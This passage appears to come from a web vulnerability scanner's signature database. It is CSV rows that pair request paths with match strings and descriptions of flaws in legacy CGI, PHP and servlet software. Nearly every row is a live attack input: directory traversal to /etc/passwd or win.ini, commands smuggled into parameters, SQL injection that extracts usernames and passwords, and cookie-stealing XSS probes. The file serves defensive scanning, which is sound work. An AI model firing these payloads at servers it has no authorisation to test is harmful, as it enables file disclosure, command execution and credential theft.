"000573","521","5","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","",""
"000574","0","5","/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","",""
"000575","0","5","/viewpage.php?file=/etc/passwd","GET","root:","","","","","PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.","",""
"000576","431","5","/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.","",""
"000577","9055","5","/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif","GET","boot loader","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","",""
"000578","9055","5","/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif","GET","root:","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","",""
"000579","14345","5","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","GET","root:","","","","","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.","",""
"000580","0","5","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000581","0","5","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000582","533","5","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files from the server.","",""
"000583","0","5","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","GET","root:","","","","","The CGI allows attackers to read arbitrary files remotely.","",""
"000584","0","5","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000585","0","5","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.","",""
"000586","0","5","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","",""
"000587","0","5","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","",""
"000588","0","5","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","",""
"000589","0","5","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000590","0","5","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000591","0","5","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000592","0","5","@CGIDIRSdb4web_c/dbdirname//etc/passwd","GET","root:","","","","","The passwd file was retrieved by using the db4web executable.","",""
"000593","563","5","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000594","5161","5","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000595","5161","5","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000596","5161","5","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000597","0","5","@CGIDIRSfaxsurvey?cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to execute commands and read files remotely.","",""
"000598","699","5","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","GET","root:","","","","","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/","",""
"000599","4969","5","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","GET","200","","","","","EZShopper search CGI allows arbitrary files to be read","",""
"000600","0","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","",""
"000601","0","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","",""
"000602","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","\[fonts\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000603","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","\[windows\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000604","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000605","0","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000606","0","5","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000607","0","5","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000608","0","5","@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd","GET","root:","","","","","Default scripts can allow arbitrary access to the host.","",""
"000609","2511","5","@CGIDIRSsbcgi/sitebuilder.cgi","GET","200","","","","","SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: /<CGIDIR>/sbcgi/sitebuilder.cgi?username=<user>&password=<password>&selectedpage=../../../../../../../../../../etc/passwd","",""
"000610","0","5","@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000611","0","5","@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000612","0","5","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000613","8192","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","",""
"000614","5161","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000615","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[windows\]","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000616","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000617","89","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000618","0","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","",""
"000619","0","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000620","0","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv\.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","",""
"000621","521","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","",""
"000622","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[fonts\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000623","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","\[windows\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""
"000624","0","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","",""
"000625","0","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","",""
"000626","0","5","@CGIDIRSphp.cgi?/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","",""
"000627","0","5","@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd","GET","root:","","","","","This CGI allows remote users to read system files.","",""
"000628","0","5","@CGIDIRSopendir.php?/etc/passwd","GET","root:","","","","","This CGI allows attackers to read any file on the web server.","",""
"000629","5161","5","@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000630","483","5","@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","",""
"000631","393","5","@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","",""
"000632","415","5","@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned using http://www.packetstormsecurity.org/0009-exploits/multihtml.c","",""
"000633","235","5","@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to read files remotely.","",""
"000634","506","5","@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","",""
"000635","506","5","@CGIDIRSway-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","",""
"000637","0","5","@CGIDIRSviewsource?/etc/passwd","GET","root:","","","","","Allows attacker to retrieve arbitrary files.  Remove from CGI directory.","",""
"000638","0","5","@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd","GET","root:","","","","","Tarantell TTAWeb Top CGI lets remote users read arbitrary files.","",""
"000639","0","5","@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000640","0","5","@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000641","7715","5","@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1","GET","200","","","","","Talkback CGI displays arbitrary files","",""
"000642","683","5","@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","",""
"000643","683","5","@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","",""
"000644","0","5","@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd","GET","root:","","","","","CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.","",""
"000645","0","5","@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000646","0","5","@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","The server install allows reading of any system file by sending encoded '../' directives.","",""
"000647","265","5","@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/password%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","",""
"000648","0","5","@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the host as the HTTP daemon owner.","",""
"000649","432","5","@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.","",""
"000650","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","",""
"000651","0","5","/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd","GET","root:","","","","","Webcalendar 0.9.41 and below allow remote users to read arbitrary files.","",""
"000652","15392","5","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","GET","root:","","","","","Wordit Limited 2000 allows command execution.","",""
"000653","0","5","@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","GET","root:","","","","","Remote file retrieval.","",""
"000654","59084","5","/page.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.","",""
"000655","56290","5","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","GET","root:","","","","","EditTag allows arbitrary file retrieval.","",""
"000656","8983","5","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","GET","root:","","","","","Remote file retrieval.","",""
"000659","693","5","@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","Ztreet Markup Language interpreter allows arbitrary files to be read remotely.","",""
"000660","0","5","@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI lets users read any file with http daemon's permissions. Upgrade to latest version","",""
"000661","242","5","@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd","GET","root:","","","","","Allows attacker to view any file (and possibly execute commands). Upgrade to latest version","",""
"000662","0","5","@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","",""
"000663","0","5","@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","",""
"000664","512","5","@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","",""
"000665","0","5","@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to retrieve files remotely.","",""
"000666","0","5","@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000667","16861","8","/athenareg.php?pass=%20;cat%20/etc/passwd","GET","root:","","","","","Athena web registration remote command execution.","",""
"000668","278","7","/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd","GET","root:","","","","","This default Netscape file allows an attacker to read arbitrary files on the host.","",""
"000669","0","5","/search?NS-query-pat=../../../../../../../../../../etc/passwd","GET","root:","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","",""
"000670","0","5","/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini","GET","boot loader","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","",""
"000671","0","7","/..\..\..\..\..\..\temp\temp.class","GET","200","","","","","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.","",""
"000672","0","7","/../../../../../../../../../../etc/passwd","GET","root:","","","","","It is possible to read files on the server by adding ../ in front of file name.","",""
"000673","0","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","",""
"000674","0","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","",""
"000675","0","3","/%3f.jsp","GET","[Ii]ndex [Oo]f ","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","",""
"000677","388","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","\[windows\]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","",""
"000678","0","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","",""
"000679","0","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","",""
"000680","0","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","\[windows\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000681","0","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000682","0","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","\[fonts\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000683","728","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","",""
"000684","36894","9","@POSTNUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","",""
"000685","0","9","@CGIDIRSclassifieds/index.cgi","GET","200","","","","","My Classifieds pre 2.12 is vulnerable to SQL injection attacks.","",""
"000686","10105","9","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","GET","parse error","","","","","IMP 2.x allows SQL injection, and reveals system information.","",""
"000687","9392","9","/userinfo.php?uid=1;","GET","Query","","","","","Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.","",""
"000688","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execution of SQL","",""
"000689","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL injection.","",""
"000690","0","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000691","0","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000692","0","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""
"000693","0","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","",""
"000694","2875","9","/phpBB2/search.php?search_id=1\\","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","",""
"000695","0","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000696","10107","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.","",""
"000697","0","4","/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000698","0","4","/imp/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000699","0","4","@CGIDIRShorde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000700","0","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""
"000701","0","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""
"000702","7501","4","/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000703","0","4","/index.php?option=search&searchword=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000704","7505","4","/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000705","7504","4","/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000706","7503","4","/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000707","0","4","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000708","7495","4","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000709","7498","4","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000710","7499","4","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000711","7497","4","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000712","7496","4","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000713","2820","4","/index.php?dir=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.","",""
"000714","0","4","/https-admserv/bin/index?/<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.","",""
"000715","2876","4","/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.","",""
"000716","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","\[SQL SERVER\] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","",""
"000717","0","4","/upload.php?type=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000718","4619","4","/soinfo.php?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.","",""
"000719","0","4","/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000720","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000721","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>","GET","<script>alert\('Vulnerable'\)<\/script\+>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000722","0","4","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000723","59015","4","/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000724","0","4","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000725","0","4","/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000726","0","4","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000727","0","4","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000728","0","4","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
